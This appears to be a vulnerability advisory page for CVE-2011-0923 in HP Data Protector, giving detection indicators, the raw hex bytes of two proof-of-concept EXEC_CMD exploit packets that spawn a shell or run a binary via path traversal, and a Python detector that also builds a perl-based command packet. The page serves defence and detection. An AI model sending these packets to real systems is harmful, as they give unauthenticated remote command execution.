CVE-2011-0923
published 2011-02-09


Priority: P2 (76), critical
CVSS 2.0 base score: 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Public exploit available
EPSS: 81.08% (99.6th percentile)
The client in HP Data Protector does not properly validate EXEC_CMD arguments, which allows remote attackers to execute arbitrary Perl code via a crafted command, related to the "local bin directory."

Detection & IOCs (extracted from sources)

port: 5555
path: ../../../../../../../../../../bin/sh
process: omniinet.exe
bytes (Windows PoC packet: EXEC_CMD with a traversal path to \windows\system32\ipconfig.exe):
\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00
bytes (Linux PoC packet: EXEC_CMD with a traversal path to /usr/bin/sh):
\x00\x00\x00\xa4\x20\x32\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x2d\x63\x68\x30\x6b\x73\x2d\x2d\x00\x20\x43\x00\x20\x32\x30\x00\x20\x2d\x2d\x63\x68\x30\x6b\x73\x2d\x00\x20\x50\x6f\x63\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x2d\x72\x30\x30\x74\x2d\x72\x30\x30\x74\x2d\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x68\x00
  • Monitor TCP port 5555, where the HP Data Protector omniinet service listens; all known exploit traffic for this CVE targets that port.
  • Detect EXEC_CMD packets whose payload to port 5555 contains path traversal sequences (e.g. '../' or '..\'); the traversal is used to reach binaries outside the Data Protector bin directory, the only directory EXEC_CMD is meant to run from.
  • On Linux/HP-UX targets, alert on EXEC_CMD packets whose path resolves to '/bin/sh' or '/usr/bin/sh' after the traversal is applied; this indicates an attempt to spawn a root shell.
  • On Windows targets, detect EXEC_CMD packets referencing 'perl.exe' with an inline '-e system()' argument; this is the technique used to bypass the single-command-only restriction and execute arbitrary commands with parameters.
  • Flag omniinet.exe spawning unexpected child processes (e.g. cmd.exe, perl.exe, sh); that indicates successful EXEC_CMD exploitation.
  • The 4-byte big-endian length prefix '\x00\x00\x00\xa4' at the start of a TCP payload on port 5555, followed by the '\x20\x32' opcode bytes, is a signature for the known PoC packets listed above. The prefix is a length field, so its value changes with the payload, and the two samples above both carry 0xa4 even though their bodies differ in length; match on the framing (length prefix, then the '\x20\x32\x00' opcode field, then a traversal sequence in the final field) rather than on the literal value alone.
  • On Windows, omniinet.exe calls FindFirstFileW() to validate the filename before execution; if the file is not found, exploitation fails, so the attacker must supply a path to an existing binary (e.g. perl.exe within the Data Protector install path).
  • The Windows EXEC_CMD variant cannot pass arguments directly to arbitrary binaries (the base path begins under C:\); the perl.exe trick is required to execute commands with parameters.
  • The exploit is unauthenticated: no credentials are required to send a malicious EXEC_CMD packet to the omniinet service on port 5555.
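The detection rules above as running logic, written as an added example (not code from HP, from the exploit authors, or from this page's sources). It parses the two IOC packets listed above plus one constructed packet, using the framing inferred from those samples: a 4-byte big-endian length, then fields each prefixed with 0x20 and terminated with 0x00, the EXEC_CMD opcode "2" first and the command path last. The field roles, the relative perl.exe path in the constructed packet and the alert names are assumptions made here, not facts from the page.

```python
"""Parse omniinet EXEC_CMD packets and apply the detection rules above.

Added example, not HP code and not an HP protocol specification: the field
layout (big-endian length, then 0x20-prefixed NUL-terminated fields, opcode
first, command last) is inferred from the two IOC byte strings on this page.
"""
import re
import struct

# The two IOC packets from this page, re-written with printable characters
# where the hex allows (byte-for-byte the same as the hex strings above).
IOC_WINDOWS = (
    b"\x00\x00\x00\xa4 2\x00 fdiskyou\x00 0\x00 SYSTEM\x00 fdiskyou\x00 C\x00 20\x00"
    b" fdiskyou\x00 Poc\x00 NTAUTHORITY\x00 NTAUTHORITY\x00 NTAUTHORITY\x00 0\x00 0\x00"
    + b" " + b"../" * 10 + b"\\windows\\system32\\ipconfig.exe\x00\x00"
)
IOC_LINUX = (
    b"\x00\x00\x00\xa4 2\x00 --ch0ks-\x00 0\x00 SYSTEM\x00 -ch0ks--\x00 C\x00 20\x00"
    b" --ch0ks-\x00 Poc\x00 -r00t-r00t-\x00 -r00t-r00t-\x00 -r00t-r00t-\x00 0\x00 0\x00"
    + b" " + b"../" * 9 + b"usr/bin/sh\x00"
)

UNIX_SHELLS = {"bin/sh", "usr/bin/sh"}
TRAVERSAL = re.compile(r"\.\.[\\/]")
# perl.exe with an inline -e system(...) argument: the Windows bypass described above
PERL_INLINE_SYSTEM = re.compile(r"perl(?:\.exe)?\s+-e\s*['\"]?system\(", re.IGNORECASE)


def build_exec_cmd(fields):
    """Frame a packet the way the IOCs are framed: big-endian length, then
    each field as 0x20 + bytes + 0x00. Used here only to build test input."""
    body = b"".join(b"\x20" + f + b"\x00" for f in fields)
    return struct.pack(">I", len(body)) + body


# Hypothetical packet constructed here; the relative perl.exe path is an
# assumption (the page only says perl.exe lives under the install path).
HYPOTHETICAL_PERL = build_exec_cmd(
    [b"2", b"attacker", b"0", b"SYSTEM", b"attacker", b"C", b"20", b"attacker",
     b"Poc", b"NTAUTHORITY", b"NTAUTHORITY", b"NTAUTHORITY", b"0", b"0",
     b'..\\..\\bin\\perl.exe -esystem("whoami")']
)


def parse_packet(pkt):
    """Return (declared_length, fields) or None if the framing does not fit."""
    if len(pkt) < 4:
        return None
    declared = struct.unpack(">I", pkt[:4])[0]
    fields = []
    for piece in pkt[4:].split(b"\x00"):
        if piece == b"":
            continue                     # terminator(s) at the end of the body
        if piece[:1] != b"\x20":
            return None                  # not the 0x20-prefixed field layout
        fields.append(piece[1:].decode("latin-1"))
    return declared, fields


def strip_traversal(path):
    """Normalise separators, drop leading ../ segments, lower-case the rest."""
    p = path.replace("\\", "/")
    while p.startswith("../"):
        p = p[3:]
    return p.lstrip("/").lower()


def analyse(pkt):
    """Classify one TCP payload seen on port 5555 and return the alert names."""
    parsed = parse_packet(pkt)
    if parsed is None:
        return {"valid": False, "exec_cmd": False, "alerts": []}
    declared, fields = parsed
    if not fields or fields[0] != "2":   # "\x20\x32": the EXEC_CMD opcode field
        return {"valid": True, "exec_cmd": False, "alerts": []}
    command = fields[-1]                 # assumption: last field is the path to run
    alerts = []
    if declared != len(pkt) - 4:
        alerts.append("length_mismatch")  # header claims one size, body is another
    if TRAVERSAL.search(command):
        alerts.append("path_traversal")
    if strip_traversal(command.split(" ")[0]) in UNIX_SHELLS:
        alerts.append("unix_shell")
    if PERL_INLINE_SYSTEM.search(command):
        alerts.append("perl_inline_system")
    return {"valid": True, "exec_cmd": True, "declared_len": declared,
            "body_len": len(pkt) - 4, "command": command, "alerts": alerts}


if __name__ == "__main__":
    for name, pkt in [("windows IOC", IOC_WINDOWS), ("linux IOC", IOC_LINUX),
                      ("hypothetical perl", HYPOTHETICAL_PERL)]:
        print(name, analyse(pkt))
```

Running it shows why the framing matters more than the literal header: the Windows IOC declares 0xa4 (164) and carries a 164-byte body, while the Linux IOC declares the same 0xa4 over a 140-byte body, so the analyser reports `length_mismatch` for it and a rule pinned to `\x00\x00\x00\xa4` would only ever catch these PoC packets. The traversal, shell-path and perl.exe rules fire on the content of the final field independently of the header value.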